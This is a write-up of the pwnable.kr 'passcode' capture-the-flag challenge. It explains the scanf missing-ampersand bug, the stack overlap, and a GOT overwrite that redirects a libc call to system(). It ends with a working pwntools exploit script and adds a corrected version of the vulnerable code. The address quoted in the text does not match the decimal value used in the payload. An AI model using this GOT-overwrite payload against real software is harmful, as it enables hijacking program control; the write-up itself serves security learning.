pwnable.kr, fifth challenge: passcode

0x000 Setting up the environment

 ① View the source code:

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 
 4 void login(){
 5     int passcode1;
 6     int passcode2;
 7 
 8     printf("enter passcode1 : ");
 9     scanf("%d", passcode1);
10     fflush(stdin);
11 
12     // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
13     printf("enter passcode2 : ");
14         scanf("%d", passcode2);
15 
16     printf("checking...\n");
17     if(passcode1==338150 && passcode2==13371337){
18                 printf("Login OK!\n");
19                 system("/bin/cat flag");
20         }
21         else{
22                 printf("Login Failed!\n");
23         exit(0);
24         }
25 }
26 
27 void welcome(){
28     char name[100];
29     printf("enter you name : ");
30     scanf("%100s", name);
31     printf("Welcome %s!\n", name);
32 }
33 
34 int main(){
35     printf("Toddler's Secure Login System 1.0 beta.\n");
36 
37     welcome();
38     login();
39 
40     // something after login...
41     printf("Now I can safely trust you that you have credential :)\n");
42     return 0;    
43 }

Tips:

fflush(stdin) flushes the input buffer, discarding whatever it still holds [nonstandard: the C standard gives fflush on an input stream no defined behaviour]
fflush(stdout) flushes the standard output buffer, writing whatever is buffered out to the standard output device

② Source code analysis

  From line 17, "passcode1==338150 && passcode2==13371337", it is clear that once passcode1 and passcode2 satisfy the condition, "system("/bin/cat flag");" is executed. Looking more closely, though, the scanf arguments on lines 9 and 14 have no ampersand: scanf is handed the value of the int rather than its address, treats that value as a pointer, and writes the 4 bytes it parsed to whatever address the uninitialised variable happened to hold on the stack. That is the vulnerability.
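  As an added example (not part of the original writeup or of the challenge's own code), this is what the login logic looks like once both scanf calls receive real pointers, their return values are checked, and the nonstandard fflush(stdin) is replaced by line-based reads; the constants are the ones from the challenge source, and the function names are my own.

```c
#include <stdio.h>
/* Passcode values hard-coded in the challenge source. */
#define PASSCODE1 338150
#define PASSCODE2 13371337

/* Parse one passcode from a line into *out. `out` is a real int* (the & the
 * original scanf calls forgot), so %d writes into the caller's variable rather
 * than through stale stack contents. %n records how many characters were
 * consumed so trailing junk is rejected. Returns 1 on success, 0 otherwise. */
int parse_passcode(const char *line, int *out)
{
    int consumed = 0;
    if (line == NULL || sscanf(line, "%d%n", out, &consumed) != 1)
        return 0;
    return line[consumed] == '\0' || line[consumed] == '\n';
}
/* Pure check: 1 if both passcodes match, 0 otherwise. */
int check_passcodes(int passcode1, int passcode2)
{
    return passcode1 == PASSCODE1 && passcode2 == PASSCODE2;
}

/* Testable login: takes the two input lines, returns 1 on success.
 * Malformed input fails closed instead of leaving a variable uninitialised. */
int login_from_lines(const char *line1, const char *line2)
{
    int passcode1 = 0, passcode2 = 0;
    if (!parse_passcode(line1, &passcode1) || !parse_passcode(line2, &passcode2))
        return 0;
    return check_passcodes(passcode1, passcode2);
}

/* Interactive front end: fgets() bounds each read and consumes the whole line,
 * the portable replacement for the nonstandard fflush(stdin). */
int main(void)
{
    char line1[32], line2[32];
    printf("enter passcode1 : ");
    fflush(stdout);
    if (fgets(line1, sizeof line1, stdin) == NULL) return 1;
    printf("enter passcode2 : ");
    fflush(stdout);
    if (fgets(line2, sizeof line2, stdin) == NULL) return 1;
    if (login_from_lines(line1, line2)) {
        puts("Login OK!");
        return 0;
    }
    puts("Login Failed!");
    return 1;
}
```

Compiling the original passcode.c with gcc or clang and -Wall also flags lines 9 and 14, because -Wformat checks that a %d conversion is given an int * rather than an int.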

  Decompile the passcode binary and print the login function:

  There is no stack cleanup between the two calls, so name and passcode1 live in the same stack region; passcode2 lands on the canary's slot and cannot be controlled, which leaves only passcode1 to work with. So how can "system("/bin/cat flag");" be reached? The puts@plt symbol in the disassembly suggests the GOT overwrite technique (my understanding: the GOT is the table that stores resolved function addresses, with a one-to-one correspondence to the PLT entries). Look at the GOT:

  The usable functions are printf, fflush and exit, because login() calls all three: overwrite one of their GOT entries with the address of the system call, and the next call to that function will fetch the flag.

 
0x001 Exploiting the vulnerability

  The idea is now clear. What remains is to find the addresses of name and passcode1 and compute the distance between them, the address of the system call, and the GOT entry addresses of printf / fflush / exit.

  The address of name is easy to see: ebp-0x70.

  passcode1 is at ebp-0x10.

  name and passcode1 are 96 bytes apart, but name has 100 bytes of space, so the last 4 bytes of name land exactly on passcode1 and overwrite it. Those 4 bytes are written as the GOT entry address of printf / fflush / exit, which can be viewed with the following command:

Then the GOT entry is overwritten with the 4-byte address of the system call, which can be found in the login function: 0x80485e3. The principle is that overflowing name replaces passcode1 with the GOT address of fflush, printf or exit, and the scanf on passcode1 then writes the address of the system call into that GOT entry. From then on, any call to fflush, printf or exit becomes a call to system.

0x002 Payload structure

The payload consists of 96 bytes of arbitrary characters, the 4-byte GOT entry address of one function (printf / fflush / exit), and the address of the system call, sent as a decimal number because it is read with "%d".

Python script as follows:

from pwn import *

# connect to the challenge box over ssh and start the binary there
pwn_ssh = ssh(host='pwnable.kr', user='passcode', password='guest', port=2222)
print(pwn_ssh.connected())
sh = pwn_ssh.process(executable='./passcode')
print(sh.recv())
# 96 bytes of padding reach passcode1; the next 4 bytes (the GOT entry
# 0x0804a004, little-endian, same bytes as '\x04\xa0\x04\x08') become the
# value of passcode1; the decimal number is what scanf("%d") then writes
# into that GOT entry. Bytes, not str, so Python 3 does not re-encode \xa0.
sh.sendline(b'A' * 96 + p32(0x0804a004) + b'134514135')
print(sh.recvall())

 

Source: www.cnblogs.com/DennyT/p/11622413.html